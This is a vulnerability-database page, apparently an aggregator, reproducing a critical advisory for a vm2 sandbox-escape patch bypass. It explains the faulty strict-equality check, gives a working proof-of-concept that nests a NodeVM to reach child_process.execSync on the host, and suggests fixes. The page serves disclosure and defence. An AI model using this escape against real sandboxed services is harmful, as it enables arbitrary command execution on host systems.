What is GHSA-m4wx-m65x-ghrr?

GHSA-m4wx-m65x-ghrr is a security advisory published by GitHub Security Advisories with Critical severity. vm2 has a CVE-2023-37903 patch bypass: nesting:true without explicit require still allows full RCE

Which CVE IDs does GHSA-m4wx-m65x-ghrr cover?

GHSA-m4wx-m65x-ghrr covers the following CVE IDs: CVE-2026-47137. Each CVE has its own detail page on EchelonGraph Pulse with the synthesized EG score.

What is the CVSS v3 score of GHSA-m4wx-m65x-ghrr?

GHSA-m4wx-m65x-ghrr has a CVSS v3 base score of 10.0, published by GitHub Security Advisories.

Which products are affected by GHSA-m4wx-m65x-ghrr?

GHSA-m4wx-m65x-ghrr affects 1 product, including: npm/vm2:\u003c= 3.11.3.

GHSA-m4wx-m65x-ghrrCriticalCVSS 10.0

vm2 has a CVE-2023-37903 patch bypass: nesting:true without explicit require still allows full RCE

Vendor

GitHub Security Advisories

Published

May 29, 2026

Last Modified

May 29, 2026

🔗 CVE IDs covered (1)

CVE-2026-47137 →

📋 Description

Summary

The fix for GHSA-8hg8-63c5-gwmx (CVE-2023-37903) introduced a check in nodevm.js line 263 that blocks the combination nesting: true + require: false. However, the check uses strict equality (options.require === false), which is trivially bypassed by omitting the require option entirely.

When require is not specified, options.require is undefined, not false. The strict equality check fails, so the security guard is skipped. Immediately after (line 280), the destructuring default require: requireOpts = false assigns requireOpts = false, producing the exact configuration the patch was designed to prevent.

Root Cause

// nodevm.js:263 — the security check
if (options.nesting === true && options.require === false) {
    throw new VMError('...');
}
// nodevm.js:280 — the default assignment (AFTER the check)
const { require: requireOpts = false } = options;
// When options.require is undefined:
//   - Line 263: undefined === false → FALSE → check skipped
//   - Line 280: requireOpts = false → same as require:false

Impact

Full Remote Code Execution on the host system. An attacker running code inside a NodeVM({ nesting: true }) sandbox (without specifying require) can:

require('vm2') to get the vm2 library
Construct an inner NodeVM with require: { builtin: ['child_process'] }
Execute arbitrary OS commands via child_process.execSync

The inner VM is completely unconstrained by the outer sandbox configuration.

Reproduction

const { NodeVM } = require('vm2');

// nesting:true, require not specified (defaults to false AFTER the check)
const nvm = new NodeVM({ nesting: true });

const result = nvm.run(`
  const { NodeVM } = require('vm2');
  const inner = new NodeVM({
    require: { builtin: ['child_process'] }
  });
  module.exports = inner.run(
    "module.exports = require('child_process').execSync('id').toString()",
    'exploit.js'
  );
`, 'exploit.js');

console.log(result); // prints host uid/gid — full RCE

Suggested Fix

// Change the check to catch both false and undefined/omitted:
if (options.nesting === true && !options.require) {
    throw new VMError('...');
}

Or move the check after the destructuring default assignment:

const { require: requireOpts = false } = options;
if (options.nesting === true && !requireOpts) {
    throw new VMError('...');
}

🎯 Affected products1

npm/vm2:<= 3.11.3